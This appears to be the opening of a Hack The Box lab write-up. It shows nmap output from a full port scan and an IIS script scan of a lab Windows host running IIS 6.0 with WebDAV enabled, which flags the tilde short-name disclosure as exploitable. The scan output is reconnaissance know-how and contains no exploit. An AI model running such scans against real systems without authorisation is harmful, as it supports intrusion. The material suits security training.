Nmap
┌──(kali㉿kali)-[~/archive/htb/labs]
└─$ sudo nmap -AO -p- $IP
starting nmap 7.92 ( https://nmap.org ) at 2022-10-07 17:44 CEST
Nmap scan report for 10.10.10.14
Host is up (0.029s latency).
not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-webdav-scan:
| server type: Microsoft-IIS/6.0
| webdav type: Unknown
| server date: Fri, 07 Oct 2022 15:46:13 GMT
| public options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_ allowed methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-methods:
|_ potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
device type: general purpose|media device
running (just guessing): Microsoft Windows 2000|XP|2003|PocketPC/CE (94%), BT embedded (85%)
os cpe: cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_xp::sp1:professional cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_ce:5.0.1400 cpe:/h:btvision:btvision%2b_box
aggressive os guesses: Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (94%), Microsoft Windows Server 2003 SP1 (93%), Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows Server 2003 SP2 (93%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows XP SP3 (91%), Microsoft Windows 2000 SP3/SP4 or Windows XP SP1/SP2 (90%), Microsoft Windows 2000 SP4 (90%), Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows 2000 SP1 (90%)
No exact OS matches for host (test conditions non-ideal).
network distance: 2 hops
service info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 28.02 ms 10.10.14.1
2 28.22 ms 10.10.10.14
os and service detection performed. please report any incorrect results at https://nmap.org/submit/ .
nmap done: 1 IP address (1 host up) scanned in 117.33 seconds
Nmap scan returns an open port of 80, hosting Microsoft IIS httpd 6.0 Target system is Microsoft Windows
Performing an additional scan.
┌──(kali㉿kali)-[~/archive/htb/labs]
└─$ nmap --script http-iis-* -p80 $IP
starting nmap 7.92 ( https://nmap.org ) at 2022-10-07 17:49 CEST
stats: 0:01:03 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
nse timing: About 50.00% done; ETC: 17:51 (0:01:04 remaining)
Nmap scan report for 10.10.10.14
Host is up (0.029s latency).
PORT STATE SERVICE
80/tcp open http
| http-iis-short-name-brute:
| vulnerable:
| Microsoft IIS tilde character "~" short name disclosure and denial of service
| state: VULNERABLE (Exploitable)
| Vulnerable IIS servers disclose folder and file names with a Windows 8.3 naming scheme inside the root folder.
| Shortnames can be used to guess or brute force sensitive filenames. Attackers can exploit this vulnerability to
| cause a denial of service condition.
|
| extra information:
|
| 8.3 filenames found:
| Folders
| aspnet~1
| Files
| postin~1.htm
|
| references:
| http://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf
| https://github.com/irsdl/IIS-ShortName-Scanner
|_ https://www.securityfocus.com/archive/1/523424
|_http-iis-webdav-vuln: WebDAV is ENABLED. No protected folder found; check not run. If you know a protected folder, add --script-args=webdavfolder=<path>
nmap done: 1 IP address (1 host up) scanned in 72.91 seconds